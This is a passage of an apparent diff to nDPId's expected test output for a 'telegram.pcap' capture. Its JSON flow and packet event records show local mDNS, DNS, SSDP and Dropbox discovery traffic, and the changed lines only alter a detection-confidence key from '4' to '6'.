00852{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"telegram.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1588779596465,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":353,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":353,"pkt_l4_len":319,"thread_ts_msec":1588779596465,"pkt":"AQBeAAD7eCjKBfrMCABFAAFTehJAAAERW5\/AqAFF4AAA+xTpFOkBP9DmAACEAAAAAAEAAAADEF9zcG90aWZ5LWNvbm5lY3QEX3RjcAVsb2NhbAAADAABAAAAeAAvEXNvbm9zNzgyOENBMDVGQUNDEF9zcG90aWZ5LWNvbm5lY3QEX3RjcAVsb2NhbAARc29ub3M3ODI4Q0EwNUZBQ0MQX3Nwb3RpZnktY29ubmVjdARfdGNwBWxvY2FsAAAQgAEAABGUAB0LVkVSU0lPTj0xLjAQQ1BhdGg9L3Nwb3RpZnl6YxFzb25vczc4MjhDQTA1RkFDQxBfc3BvdGlmeS1jb25uZWN0BF90Y3AFbG9jYWwAACGAAQAAAHgAHwAAAAAFeBFzb25vczc4MjhDQTA1RkFDQwVsb2NhbAARc29ub3M3ODI4Q0EwNUZBQ0MFbG9jYWwAAAGAAQAAAHgABMCoAUU="} -00689{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"telegram.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596465,"flow_last_seen":1588779596465,"flow_idle_time":200000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":1588779596465,"l3_proto":"ip4","src_ip":"192.168.1.69","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_spotify-connect._tcp.local"}} +00689{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"telegram.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596465,"flow_last_seen":1588779596465,"flow_idle_time":200000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":1588779596465,"l3_proto":"ip4","src_ip":"192.168.1.69","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_spotify-connect._tcp.local"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"telegram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596708,"flow_last_seen":1588779596708,"flow_idle_time":200000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1588779596708,"l3_proto":"ip4","src_ip":"192.168.1.75","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00571{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"telegram.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1588779596708,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1588779596708,"pkt":"AQBeAAD7jP5XIzfkCABFAACAA9gAAP8RFKbAqAFL4AAA+xTpFOkAbODJAACEAAAAAAEAAAABBV9kYWNwBF90Y3AFbG9jYWwAAAwAAQAAAAAAHxxpVHVuZXNfQ3RybF80QUJCMzlBNDFFRUZERUIzwAwAACkFoAAAEZQAEgAEAA4A2a7+VyM35Iz+VyM35A=="} -00678{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"telegram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596708,"flow_last_seen":1588779596708,"flow_idle_time":200000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1588779596708,"l3_proto":"ip4","src_ip":"192.168.1.75","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_dacp._tcp.local"}} +00678{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"telegram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596708,"flow_last_seen":1588779596708,"flow_idle_time":200000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1588779596708,"l3_proto":"ip4","src_ip":"192.168.1.75","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_dacp._tcp.local"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"telegram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596708,"flow_last_seen":1588779596708,"flow_idle_time":200000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1588779596708,"l3_proto":"ip6","src_ip":"fe80::4ba:91a:7817:e318","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00599{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"telegram.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1588779596708,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":162,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":162,"pkt_l4_len":108,"thread_ts_msec":1588779596708,"pkt":"MzMAAAD7jP5XIzfkht1gD8IfAGwR\/\/6AAAAAAAAABLoJGngX4xj\/AgAAAAAAAAAAAAAAAAD7FOkU6QBsHDYAAIQAAAAAAQAAAAEFX2RhY3AEX3RjcAVsb2NhbAAADAABAAAAAAAfHGlUdW5lc19DdHJsXzRBQkIzOUE0MUVFRkRFQjPADAAAKQWgAAARlAASAAQADgDZrv5XIzfkjP5XIzfk"} -00686{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"telegram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596708,"flow_last_seen":1588779596708,"flow_idle_time":200000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1588779596708,"l3_proto":"ip6","src_ip":"fe80::4ba:91a:7817:e318","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_dacp._tcp.local"}} +00686{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"telegram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596708,"flow_last_seen":1588779596708,"flow_idle_time":200000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1588779596708,"l3_proto":"ip6","src_ip":"fe80::4ba:91a:7817:e318","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_dacp._tcp.local"}} 00694{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"telegram.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1588779597257,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1588779597257,"pkt":"AQBeAAD7jP5XIzfkCABFAADbeQgAAP8RnxrAqAFL4AAA+xTpFOkAx\/OHAAAAAAAFAAAAAQABD19jb21wYW5pb24tbGluawRfdGNwBWxvY2FsAAAMgAEIX2hvbWVraXTAHAAMgAEIX2FpcnBsYXnAHAAMgAEFX3Jhb3DAHAAMgAEcaVR1bmVzX0N0cmxfNEFCQjM5QTQxRUVGREVCMwVfZGFjcMAcAP+AAcBWACEAAQAAAHgAFwAAAADHIw5HYWJyaWVsZXMtaVBhZMAhAAApBaAAABGUABIABAAOANqu\/lcjN+SM\/lcjN+Q="} 00724{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"telegram.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1588779597258,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":253,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":253,"pkt_l4_len":199,"thread_ts_msec":1588779597258,"pkt":"MzMAAAD7jP5XIzfkht1gD8IfAMcR\/\/6AAAAAAAAABLoJGngX4xj\/AgAAAAAAAAAAAAAAAAD7FOkU6QDHLvQAAAAAAAUAAAABAAEPX2NvbXBhbmlvbi1saW5rBF90Y3AFbG9jYWwAAAyAAQhfaG9tZWtpdMAcAAyAAQhfYWlycGxhecAcAAyAAQVfcmFvcMAcAAyAARxpVHVuZXNfQ3RybF80QUJCMzlBNDFFRUZERUIzBV9kYWNwwBwA\/4ABwFYAIQABAAAAeAAXAAAAAMcjDkdhYnJpZWxlcy1pUGFkwCEAACkFoAAAEZQAEgAEAA4A2q7+VyM35Iz+VyM35A=="} 00793{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"telegram.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1588779597258,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":308,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":308,"pkt_l4_len":274,"thread_ts_msec":1588779597258,"pkt":"AQBeAAD7jP5XIzfkCABFAAEmpacAAP8RcjDAqAFL4AAA+xTpFOkBEl+aAACEAAAAAAMAAAADCV9zZXJ2aWNlcwdfZG5zLXNkBF91ZHAFbG9jYWwAAAwAAQAAEZQADQVfZGFjcARfdGNwwCMBOAExATMBRQE3ATEBOAE3AUEBMQE5ATABQQFCATQBMAEwATABMAEwATABMAEwATABMAEwATABMAEwATgBRQFGA2lwNgRhcnBhAAAMgAEAAAB4ABEOR2FicmllbGVzLWlQYWTAIwI3NQExAzE2OAMxOTIHaW4tYWRkcsCFAAyAAQAAAHgAAsCVwEEAL4ABAAAAeAAGwEEAAgAIwKYAL4ABAAAAeAAGwKYAAgAIAAApBaAAABGUABIABAAOANqu\/lcjN+SM\/lcjN+Q="} 00824{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"telegram.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1588779597258,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":328,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":328,"pkt_l4_len":274,"thread_ts_msec":1588779597258,"pkt":"MzMAAAD7jP5XIzfkht1gD8IfARIR\/\/6AAAAAAAAABLoJGngX4xj\/AgAAAAAAAAAAAAAAAAD7FOkU6QESmwYAAIQAAAAAAwAAAAMJX3NlcnZpY2VzB19kbnMtc2QEX3VkcAVsb2NhbAAADAABAAARlAANBV9kYWNwBF90Y3DAIwE4ATEBMwFFATcBMQE4ATcBQQExATkBMAFBAUIBNAEwATABMAEwATABMAEwATABMAEwATABMAEwATABOAFFAUYDaXA2BGFycGEAAAyAAQAAAHgAEQ5HYWJyaWVsZXMtaVBhZMAjAjc1ATEDMTY4AzE5Mgdpbi1hZGRywIUADIABAAAAeAACwJXAQQAvgAEAAAB4AAbAQQACAAjApgAvgAEAAAB4AAbApgACAAgAACkFoAAAEZQAEgAEAA4A2q7+VyM35Iz+VyM35A=="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"telegram.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779597291,"flow_last_seen":1588779597291,"flow_idle_time":200000,"flow_min_l4_payload_len":278,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":278,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1588779597291,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.75","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00810{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"telegram.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1588779597291,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":320,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":320,"pkt_l4_len":286,"thread_ts_msec":1588779597291,"pkt":"jP5XIzfkKDc3AG3ICABFAAEy\/KUAAP8ROizAqAFNwKgBSxTpFOkBHhkOAACEAAAAAAEAAAAED19jb21wYW5pb24tbGluawRfdGNwBWxvY2FsAAAMAAEAABGUABANTHVjYeKAmXMgaU1hY8AMwDIAIYABAAAAeAATAAAAAMAFCkx1Y2FzLWlNYWPAIcAyABCAAQAAEZQAWBZycEJBPTM5OjJBOjg4OkFDOjQxOkFCCnJwVnI9MTUyLjERcnBIST1mOWM0NmM2ZGQwN2QRcnBITj0zYzVkYzVjZTk1NzgRcnBIQT04Y2E4Y2I3MzFjMWMNTHVjYeKAmXMgaU1hYwxfZGV2aWNlLWluZm\/AHAAQAAEAABGUABoObW9kZWw9aU1hYzExLDMKb3N4dmVycz0xN8BUAAGAAQAAAHgABMCoAU0="} -00690{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"telegram.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779597291,"flow_last_seen":1588779597291,"flow_idle_time":200000,"flow_min_l4_payload_len":278,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":278,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1588779597291,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.75","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_companion-link._tcp.local"}} +00690{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"telegram.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779597291,"flow_last_seen":1588779597291,"flow_idle_time":200000,"flow_min_l4_payload_len":278,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":278,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1588779597291,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.75","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_companion-link._tcp.local"}} 00609{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"telegram.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1588779598465,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1588779598465,"pkt":"AQBef\/\/6wJrQLWJ0CABFAACa8TAAAAERFkvAqAE17\/\/\/+tQiB2wAhkPyTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQoA"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"telegram.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779600828,"flow_last_seen":1588779600828,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1588779600828,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":61631,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"telegram.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1588779600828,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"thread_ts_msec":1588779600828,"pkt":"EBMx8Tl2KDc3AG3ICABFAABGiX4AAP8RronAqAFNwKgBAfC\/ADUAMkhio9MBAAABAAAAAAAABWU3MDQ3A2UxMgpha2FtYWllZGdlA25ldAAAAQAB"} -00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"telegram.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779600828,"flow_last_seen":1588779600828,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1588779600828,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":61631,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e7047.e12.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"telegram.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779600828,"flow_last_seen":1588779600828,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1588779600828,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":61631,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e7047.e12.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00809{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"telegram.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1588779600838,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":320,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":320,"pkt_l4_len":286,"thread_ts_msec":1588779600838,"pkt":"jP5XIzfkKDc3AG3ICABFAAEyb04AAP8Rx4PAqAFNwKgBSxTpFOkBHhkOAACEAAAAAAEAAAAED19jb21wYW5pb24tbGluawRfdGNwBWxvY2FsAAAMAAEAABGUABANTHVjYeKAmXMgaU1hY8AMwDIAIYABAAAAeAATAAAAAMAFCkx1Y2FzLWlNYWPAIcAyABCAAQAAEZQAWBZycEJBPTM5OjJBOjg4OkFDOjQxOkFCCnJwVnI9MTUyLjERcnBIST1mOWM0NmM2ZGQwN2QRcnBITj0zYzVkYzVjZTk1NzgRcnBIQT04Y2E4Y2I3MzFjMWMNTHVjYeKAmXMgaU1hYwxfZGV2aWNlLWluZm\/AHAAQAAEAABGUABoObW9kZWw9aU1hYzExLDMKb3N4dmVycz0xN8BUAAGAAQAAAHgABMCoAU0="} 00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"telegram.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1588779600842,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":100,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":100,"pkt_l4_len":66,"thread_ts_msec":1588779600842,"pkt":"KDc3AG3IEBMx8Tl2CABFAABWE2lAADkRqo\/AqAEBwKgBTQA18L8AQgAAo9OBgAABAAEAAAAABWU3MDQ3A2UxMgpha2FtYWllZGdlA25ldAAAAQABwAwAAQABAAAAFAAEXHr3XA=="} -00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":41,"source":"telegram.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779600828,"flow_last_seen":1588779600842,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1588779600842,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":61631,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e7047.e12.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"92.122.247.92"}} +00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":41,"source":"telegram.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779600828,"flow_last_seen":1588779600842,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1588779600842,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":61631,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e7047.e12.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"92.122.247.92"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"telegram.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779601222,"flow_last_seen":1588779601222,"flow_idle_time":200000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1588779601222,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01069{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"telegram.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1588779601222,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":506,"pkt_l4_len":472,"thread_ts_msec":1588779601222,"pkt":"\/\/\/\/\/\/\/\/KDc3AG3ICABFAAHsBFEAAEARsrvAqAFN\/\/\/\/\/0RcRFwB2FvpeyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiaG9zdF9pbnQiOiA0MDk1NjMzNTA1MDQ3NDIyMDI0ODQ4MjA1NjAzMDgyNTQwNDYyOSwgImRpc3BsYXluYW1lIjogIiIsICJuYW1lc3BhY2VzIjogWzUzMDMzMDEyNDgsIDc4NTI2NjE3NywgMTUyNjI2MzA0NSwgMjg1MjE2MDcsIDE0ODE5MzM3LCA0NTE0NzI2NTgsIDczNjM0MTUyOCwgOTM4ODEzODQ5LCAyNzUwMzcwNTYwLCAxMjY3Njk1MTA5LCA1NDQwNDA3MDcyLCA1ODM0NDk5NiwgNDA1NjQ2MjU5MiwgNzA1MzYyNzE4NCwgMTUyMjE3NzU4NywgMTQyMTExNDM5OSwgMTI1MjExNjQyOSwgNzA3OTYzNjY4OCwgMTc2OTY0MzA3LCAxMjU1NDA1NjYsIDEwNDc0MjgxODksIDQ3MTYxOTAwNDgsIDU0NjcxNjMwODgsIDExOTUwNDQwNzEsIDk2ODUzMjI0LCAxNzYwOTk2MywgNjQ3ODMwMzQ0MCwgNTExNzA2NjQyLCA2Mjk3OTU1MTg0LCAxNDE1NjIwMzUwXX0="} -00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"telegram.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779601222,"flow_last_seen":1588779601222,"flow_idle_time":200000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1588779601222,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"telegram.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779601222,"flow_last_seen":1588779601222,"flow_idle_time":200000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1588779601222,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"telegram.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779601223,"flow_last_seen":1588779601223,"flow_idle_time":200000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1588779601223,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01066{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"telegram.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1588779601223,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":506,"pkt_l4_len":472,"thread_ts_msec":1588779601223,"pkt":"\/\/\/\/\/\/\/\/KDc3AG3ICABFAAHskFkAAEARZAvAqAFNwKgB\/0RcRFwB2JlBeyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiaG9zdF9pbnQiOiA0MDk1NjMzNTA1MDQ3NDIyMDI0ODQ4MjA1NjAzMDgyNTQwNDYyOSwgImRpc3BsYXluYW1lIjogIiIsICJuYW1lc3BhY2VzIjogWzUzMDMzMDEyNDgsIDc4NTI2NjE3NywgMTUyNjI2MzA0NSwgMjg1MjE2MDcsIDE0ODE5MzM3LCA0NTE0NzI2NTgsIDczNjM0MTUyOCwgOTM4ODEzODQ5LCAyNzUwMzcwNTYwLCAxMjY3Njk1MTA5LCA1NDQwNDA3MDcyLCA1ODM0NDk5NiwgNDA1NjQ2MjU5MiwgNzA1MzYyNzE4NCwgMTUyMjE3NzU4NywgMTQyMTExNDM5OSwgMTI1MjExNjQyOSwgNzA3OTYzNjY4OCwgMTc2OTY0MzA3LCAxMjU1NDA1NjYsIDEwNDc0MjgxODksIDQ3MTYxOTAwNDgsIDU0NjcxNjMwODgsIDExOTUwNDQwNzEsIDk2ODUzMjI0LCAxNzYwOTk2MywgNjQ3ODMwMzQ0MCwgNTEx